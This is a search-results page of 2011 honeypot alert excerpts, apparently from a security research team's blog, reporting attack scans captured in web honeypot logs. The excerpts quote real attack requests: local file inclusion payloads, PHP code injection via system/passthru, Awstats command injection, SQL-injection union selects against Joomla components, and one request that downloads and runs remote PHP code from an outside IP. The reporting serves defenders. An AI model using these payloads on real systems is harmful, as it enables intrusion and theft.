Showing 9 results for: 2011 ×[Honeypot Alert] ×

[Honeypot Alert] User Agent Field Arbitrary PHP Code Execution

While reviewing today's web honeypot logs, SpiderLabs Research identified two new attack variations. Focus on Local File Inclusion attacks Here are some of the LFI attack payloads identified today: GET /_functions.php?prefix=../../../../../../../proc/self/environ%00 HTTP/1.1 GET /ashnews.php?pathtoashnews=../../../../../../../proc/self/environ%00 HTTP/1.1 GET /b2-tools/gm-2-b2.php?b2inc=../../../../../../../proc/self/environ%00 HTTP/1.1 GET /catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ%00...

[Honeypot Alert] phpAlbum PHP Code Execution Attacks

We have seen a number of scans probing for phpAlbum code execution vulns in our web honeypot logs: GET /admin/main.php?cmd=setquality&var1=1%27.system%28%27echo%200wn3d.Nu%27%29.%27; HTTP/1.1 GET /admin/main.php?cmd=setquality&var1=1%27.system%28%27wget%20http://72.41.115.123/.mods/pbot.txt%20-O%20pb.php;%20php%20pb.php;%20wget%20http://72.41.115.123/.mods/sh.txt%20-O%20h4rd.php%27%29.%27; HTTP/1.1 GET /album/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1 GET /albums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1 GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0 GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.0 GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1 GET...

[Honeypot Alert] Awstats Command Injection Scanning Detected

Issue Detected Our daily web honeypot analysis has detected an increase in scanning looking for command injection flaws in the Awstats package. Here are example attacks from the logs: GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.0 GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1 GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.0 GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d...

[Honeypot Alert] WordPress/Joomla/Mambo SQL Injection Scanning Detected

Our web honeypot analysis today detected scanning looking for SQL Injection flaws in a number of Wordpress/Joomla/Mambo components. GET /index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1 GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&filter=&city_id=&function_id=&limit=5&pageno=1&job_id=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fall%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET /index.php?option=com_rsgallery&page=inline&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C10%2C11%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos__users-- HTTP/1.1 GET /index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C0x33633273366962%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C2%2C2%2C2%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1 GET...

[Honeypot Alert] Mass Joomla Component LFI Attacks Identified

Joomla Component LFI Vulnerabilities Joomla has hundreds of Controller components. Check out the Joomla Extension site for examples. Unfortunately, the vast majority of these components have LFI vulnerabilities. The vulnerability details are pretty much the same - The vulnerable page...

[Honeypot Alert] WordPress Timthumb Attacks Rising

SpiderLabs Research Team has been tracking an increase in WordPress Timthumb plug-in scanning. How wide spread are the attacks? We just added the following entry to the Web Hacking Incident Database (WHID) - WHID 2011-262: Hackers 'Timthumb' Their Noses At...